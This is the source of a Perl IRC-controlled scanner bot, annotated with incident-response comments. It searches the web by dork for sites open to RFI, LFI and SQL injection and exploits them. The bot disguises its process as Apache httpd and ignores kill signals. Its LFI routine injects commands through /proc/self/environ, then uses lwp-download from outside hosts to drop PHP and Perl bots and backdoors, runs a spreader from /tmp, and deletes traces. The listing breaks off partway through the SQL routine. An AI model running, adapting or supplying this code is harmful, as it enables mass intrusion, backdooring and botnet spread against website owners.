Script IRC
#!/usr/bin/perl
############################################
# VopCrew Multi Scanner v5.0 Final Release #
# Moded by bjork #
# Copyleft © 2010 #bjork@byroe.net #
############################################
# Dipersilahkan yang Ingin Menambah Engine #
############################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;
# Analyst note: the values below are the operator's hard-coded configuration
# and double as host/network indicators when triaging a compromised server.
# Process title later copied into $0 so the script is listed as Apache httpd.
my $fakeproc = "/usr/local/apache/bin/httpd -DSSL";
# IRC control server; replaced by the first command-line argument if one is given.
$ircserver = "pulau.byroe.net";
my $ircport = "6667";
my $nickname = "[parah]";
my $ident = "knownothing";
# Control channel the bot joins, and the nick that receives private status reports.
my $channel = "#parah";
my $runner = "bjork";
my $fullname = '15(7@2Multi-Scanner15)';
# Channel commands that start the three scan types.
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $sqlcmd = '!sql';
# Remotely hosted file; in the visible code it is only echoed in RFI hit reports.
my $phpshell = 'http://www.green-light.de/components/com_sef/img.jpg?';
# Marker string expected in a response when the remote file was included.
$rfi_result = "evilc0de";
# Path-traversal suffix used by the LFI check (targets /proc/self/environ, with a trailing %00).
$lfi_test =
"../../../../../../../../../../../../../../../../../proc/self/environ%00";
# Remotely hosted file that the RFI check appends to candidate URLs; also fetched by response().
$injector = "http://www.green-light.de/components/com_sef/id?";
# A single quote appended to URLs; the two patterns below are the database
# error texts (MySQL, then MSSQL wording) searched for in the reply.
$sql_test = "'";
$sql_output = ("You have an error in your SQL syntax|check the manual
that corresponds to your MySQL server version for the right syntax to
use near");
$asp_output = ("Unclosed quotation mark after the character
string|Unclosed quotation mark before the character string");
# Startup banner printed to the launching terminal, including the real PID.
my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully
...\n [-] Process/PID : $fakeproc - $$\n";
print $success;
# Interrupt, hangup and terminate are ignored, so responders need a signal
# that cannot be ignored (SIGKILL, or SIGSTOP to freeze it for triage).
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
chdir("/");
$ircserver="$ARGV[0]" if $ARGV[0];
# Overwrite the process title. Detection note: on Linux /proc/<pid>/exe still
# points at the perl interpreter, which will not match the httpd name shown by ps.
$0 = "$fakeproc"."\0"x16;;
# Detach: the parent exits and the child continues in the background.
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
# Global state: connected servers keyed by socket, and the select set polled
# by the main loop. %DCC and $dcc_sel are not used in the visible code.
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
# Write one raw IRC protocol line, terminated with "\n".
# Called with two arguments, the first is the socket and the second the line;
# called with one argument, the line goes to the global $IRC_cur_socket.
# The text is written as given; nothing here strips CR/LF from it.
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# Open a TCP connection to the IRC server and register the bot.
# Arguments: nickname, server host, server port.
# Returns 1 when the connection cannot be opened.
# On success the socket becomes $IRC_cur_socket, is added to the select set,
# and its host/port/nick/local address are recorded in %irc_servers.
# Network signature: a NICK line followed by a USER line carrying $ident,
# the local socket address, the server name and $fullname.
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} =
$IRC_socket->sockhost;
nick("$mynick");
sendraw("USER $ident ".$IRC_socket->sockhost."
$ircserver_con :$fullname");
sleep 1;
}
}
# Handle one line received from the IRC server (protocol housekeeping only;
# the scan commands are matched in the main loop, not here).
#   PING            -> answers with PONG.
#   PRIVMSG         -> answers a CTCP VERSION query with a fixed mIRC banner,
#                      i.e. the bot presents itself as an ordinary desktop client.
#   NICK            -> tracks its own nickname change.
#   433             -> nickname in use: retries with "|<random number>" appended.
#   001             -> registration complete: sets user modes, joins $channel,
#                      posts a fixed greeting and messages $runner.
# Detection note: the fixed greeting strings sent right after JOIN are stable
# content signatures for IRC traffic inspection.
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?)
\:(.+)/) {
# Captures: sender nick, host, target, message text.
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled
Mardam-Bey\001");
}
# The captured values below are not used further in this block.
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :H3LLCR3W UnderGround");
sendraw("PRIVMSG $runner :Hi $runner im here !!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname",
"$ircserver", "$ircport"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
#####################################################################
############################[ CMD LIST
]#############################
#####################################################################
if ($msg=~ /PRIVMSG $channel :!help/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 $rficmd <bug> <dork> ");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 $lficmd <bug> <dork> ");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 $sqlcmd <bug> <dork> ");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Help15) 8,4 !version | !about ");
}
if ($msg=~ /PRIVMSG $channel :!id/){
&response();
}
if($msg =~ /PRIVMSG $channel :!quit/){
exit(0);
}
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Version15)12 H3LLCR3W SQL Scanner Moded");
}
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2Engine15)12 Google, Bing, AllTheWeb, Altavista, ASK, UOL, Yahoo,
Onet, Witch");
}
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2PID15)12 Process/ID : 4 $fakeproc - $$");
}
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2About15)3 H3LLCR3W SQL Scanner Moded");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2About15)3 Moded by bjork/");
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2About15)3 Copyleft © 2009 H3LLCR3W");
}
#####################################################################
###############################[ RFI
]###############################
#####################################################################
#####################################################################
Google Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2RFI15)(7@2H3LLCR3W15)12 Dork :4 $d0rk");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2RFI15)(7@2H3LLCR3W15)12 File :4 $bugx");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2RFI15)(7@2H3LLCR3W15)7 Search Engine Loading ...");
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Google2 Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe2";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Altavista Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
ASK Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
UoL Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Onet Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Onet";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Witch Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Witch";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$rficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
###############################[ LFI
]###############################
#####################################################################
#####################################################################
Google Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2LFI15)(7@2H3LLCR3W15)12 Dork :4 $d0rk");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2LFI15)(7@2H3LLCR3W15)12 File :4 $bugx");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2LFI15)(7@2H3LLCR3W15)7 Search Engine Loading ...");
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Google2 Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe2";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Altavista Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
ASK Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
UoL Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Onet Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Onet";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Witch Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Witch";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Virgilio Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Virgillio";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Sapo Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Sapo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Naver Engine
if ($msg=~ /PRIVMSG $channel :$lficmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Naver";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
###############################[ SQL
]###############################
#####################################################################
#####################################################################
Google Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2SQL15)(7@2H3LLCR3W15)12 Dork :4 $d0rk");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2SQL15)(7@2H3LLCR3W15)12 File :4 $bugx");
sendraw($IRC_cur_socket,
"PRIVMSG $channel :15(7@2SQL15)(7@2H3LLCR3W15)7 Search Engine Loading ...");
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
AllTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Google2 Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "GooGLe2";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Altavista Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
ASK Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
UoL Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Onet Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Onet";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Witch Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "Witch";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
Yahoo Engine
if ($msg=~ /PRIVMSG $channel :$sqlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH
:\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
#####################################################################
Procedure
# Remote-file-inclusion scan routine.
# Arguments: engine name, URL path/parameter fragment ("bug"), search query.
# Steps visible here: gather candidate hosts from whichever search-engine
# helpers match the engine name, de-duplicate them with calculate(), report
# the counts to the channel, then request
#   http://<target><bug><$injector>?
# for each candidate and look for the $rfi_result marker in the body.
# A body that also contains "uid=" is reported as SAFEMODE-OFF.
# @total is not declared with my in this sub, so it is a package global.
# Detection note (victim side): the request carries a full external URL as a
# parameter value, which is the usual access-log signature of RFI probing;
# PHP's allow_url_include=Off removes this class of inclusion.
sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @google=&google($dork);
push(@total, @google);
}
if ($engz =~ /AllTheWeb/) {
my @alltheweb=&alltheweb($dork);
push(@total, @alltheweb);
}
if ($engz =~ /Bing/) {
my @Bing=&Bing($dork);
push(@total, @Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @altavista=&altavista($dork);
push(@total, @altavista);
}
if ($engz =~ /AsK/) {
my @ask=&ask($dork);
push(@total, @ask);
}
if ($engz =~ /UoL/) {
my @uol=&uol($dork);
push(@total, @uol);
}
if ($engz =~ /Onet/) {
my @onet=&onet($dork);
push(@total, @onet);
}
if ($engz =~ /Witch/) {
my @witch=&witch($dork);
push(@total, @witch);
}
if ($engz =~ /Google2/) {
my @google2=&google2($dork);
push(@total, @google2);
}
if ($engz =~ /YahOo/) {
my @yahoo=&yahoo($dork);
push(@total, @yahoo);
}
# De-duplicate candidates and report raw vs. unique counts to the channel.
my @clean = &calculate(@total);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4
(".scalar(@clean).")");
if (scalar(@clean) != 0) {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)7 Exploiting4 $dork");
}
my $uni = scalar(@clean);
foreach my $target (@clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)10 Scan Finish for14 $dork");
}
# $xpl is the URL actually requested; $vuln is only the text posted to the channel.
my $xpl = "http://".$target.$bugz.$injector."?";
my $vuln = "http://".$target."12".$bugz."7".$phpshell."?";
my $re = getcontent($xpl);
if($re =~ /$rfi_result/ && $re =~ /uid=/){
os($xpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)15(13@12Vulnera
e15)4 ".$vuln."
15(7@6".$os."15)(7@3SAFEMODE-OFF15)");
}
elsif($re =~ /$rfi_result/)
{
os($xpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2RFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$vuln."
15(7@6".$os."15)(7@4SAFEMODE-ON15)");
}
}
}
# Local-file-inclusion scan routine, including the post-exploitation stage.
# Arguments: engine name, URL path/parameter fragment ("bug"), search query.
# Candidate gathering and de-duplication mirror rfiscan(). For each candidate
# it requests http://<target><bug><$lfi_test> and treats a body containing
# both "DOCUMENT_ROOT=/" and "HTTP_USER_AGENT" as a readable
# /proc/self/environ. It then forks and calls exploit() repeatedly, which
# places PHP code in the User-Agent header of further requests to that URL.
#
# Incident-response indicators taken from this block:
#   - request paths ending in ".../proc/self/environ%00"
#   - files named else.php, news.php, images.php written where the web
#     application runs, and /tmp/tmp2217 (created, run with perl, removed)
#   - outbound lwp-download fetches to www.chompas.de and dozo.rgr.jp
#   - cleanup that deletes else.php and ping.php afterwards, so absence of
#     those two files does not rule out compromise
# Private messages to the nick "bjork" report the news.php and images.php drops.
sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @google=&google($dork);
push(@total, @google);
}
if ($engz =~ /AllTheWeb/) {
my @alltheweb=&alltheweb($dork);
push(@total, @alltheweb);
}
if ($engz =~ /Bing/) {
my @Bing=&Bing($dork);
push(@total, @Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @altavista=&altavista($dork);
push(@total, @altavista);
}
if ($engz =~ /AsK/) {
my @ask=&ask($dork);
push(@total, @ask);
}
if ($engz =~ /UoL/) {
my @uol=&uol($dork);
push(@total, @uol);
}
if ($engz =~ /Onet/) {
my @onet=&onet($dork);
push(@total, @onet);
}
if ($engz =~ /Witch/) {
my @witch=&witch($dork);
push(@total, @witch);
}
if ($engz =~ /Google2/) {
my @google2=&google2($dork);
push(@total, @google2);
}
if ($engz =~ /YahOo/) {
my @yahoo=&yahoo($dork);
push(@total, @yahoo);
}
if ($engz =~ /Virgillio/) {
my @virgillio=&virgillio($dork);
push(@total, @virgillio);
}
if ($engz =~ /Sapo/) {
my @sapo=&sapo($dork);
push(@total, @sapo);
}
if ($engz =~ /Naver/) {
my @naver=&naver($dork);
push(@total, @naver);
}
# De-duplicate candidates and report raw vs. unique counts to the channel.
my @clean = &calculate(@total);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4
(".scalar(@clean).")");
if (scalar(@clean) != 0) {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)7 Exploiting4 $dork");
}
my $uni=scalar(@clean);
foreach my $target (@clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)10 Scan Finish for14 $dork");
}
# Probe: a response exposing process environment variables marks the target.
my $xpl = "http://".$target.$bugz.$lfi_test;
my $re = getcontent($xpl);
if ($re =~ /DOCUMENT_ROOT=\// && $re =~
/HTTP_USER_AGENT/){
# Double fork so the follow-up work runs in a detached grandchild.
if (my $pid = fork) { waitpid($pid, 0); } else
{ if (fork) { exit; } else {
# Stage 1: system and user identification, reported to the channel.
my $ijo = exploit($xpl,"uname -svnrp;echo bjork;id");
$ijo =~ s/\n//g;
if ($ijo =~ /bjork#(.*)bjorkuid=(.*)#bjork/sg) {
my ($sys,$uid) = ($1,$2);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)4 http://".$target."12".$bugz."6[LFI]
15(7@3".$sys." 7uid=".$uid."15)(7@2VopCrew15)");
}
sleep(5);
# Stage 2: download saved as else.php, then requested once over HTTP.
my $pbot = exploit($xpl,"echo bjork
;lwp-download -a http://www.chompas.de/components/com_sef/beduls.txt
else.php");
$pbot =~ s/\n//g;
if ($pbot =~ /bjork#(.*)#bjork/sg) {
my $phpbot = "http://".$target."else.php";
getcontent($phpbot);
sendraw($IRC_cur_socket, "PRIVMSG $channel :12Trying to
spread PHPbot..");
}
sleep(5);
# Stage 3: download to /tmp/tmp2217, executed with perl, then deleted.
my $spreader = exploit($xpl,"echo bjork ;cd
/tmp;lwp-download -a http://www.chompas.de/components/com_sef/Fx199.txt
tmp2217;perl tmp2217;rm -rf tmp2217");
$spreader =~ s/\n//g;
if ($spreader =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :12Trying to
spread Perlbot..");
}
sleep(5);
# Stage 4: download saved as news.php; location reported privately.
my $bekdur = exploit($xpl,"echo bjork
;lwp-download -a http://dozo.rgr.jp/ping/.../com_sef/news.jpg news.php");
$bekdur =~ s/\n//g;
if ($bekdur =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG bjork :12Backdoor On
12".$target."news.php");
}
sleep(5);
# Stage 5: download saved as images.php; location reported privately.
my $cp = exploit($xpl,"echo bjork ;lwp-download
-a http://dozo.rgr.jp/ping/.../com_sef/help.jpg images.php");
$cp =~ s/\n//g;
if ($cp =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG bjork :12CP-Hacked
on 12".$target."images.php");
}
# Stage 6: removes else.php and ping.php from the working directory.
my $clean = exploit($xpl,"echo bjork ;rm -rf
else.php;rm -rf ping.php");
$clean =~ s/\n//g;
if ($clean =~ /bjork#(.*)#bjork/sg) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :12[+]
12Clear ");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2LFI15)(7@2$engz15)15(13@12Vulnerable15)4 ".$xpl." 15(7@3VopCrew15)");
}
} exit } sleep(3);
}
}
}
# SQL-error scan routine.
# Arguments: engine name, URL path/parameter fragment ("bug"), search query.
# Candidate gathering and de-duplication mirror rfiscan(). For each candidate
# it requests http://<target><bug>' (a single quote appended) and greps the
# body for the MySQL error text in $sql_output, then the MSSQL text in
# $asp_output. Only detection is performed here; hits are posted to the channel.
# Defensive note: this check depends entirely on database error text reaching
# the HTTP response, so suppressing verbose errors hides a site from it, while
# parameterized queries address the underlying flaw.
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @google=&google($dork);
push(@total, @google);
}
if ($engz =~ /AllTheWeb/) {
my @alltheweb=&alltheweb($dork);
push(@total, @alltheweb);
}
if ($engz =~ /Bing/) {
my @Bing=&Bing($dork);
push(@total, @Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @altavista=&altavista($dork);
push(@total, @altavista);
}
if ($engz =~ /AsK/) {
my @ask=&ask($dork);
push(@total, @ask);
}
if ($engz =~ /UoL/) {
my @uol=&uol($dork);
push(@total, @uol);
}
if ($engz =~ /Onet/) {
my @onet=&onet($dork);
push(@total, @onet);
}
if ($engz =~ /Witch/) {
my @witch=&witch($dork);
push(@total, @witch);
}
if ($engz =~ /Google2/) {
my @google2=&google2($dork);
push(@total, @google2);
}
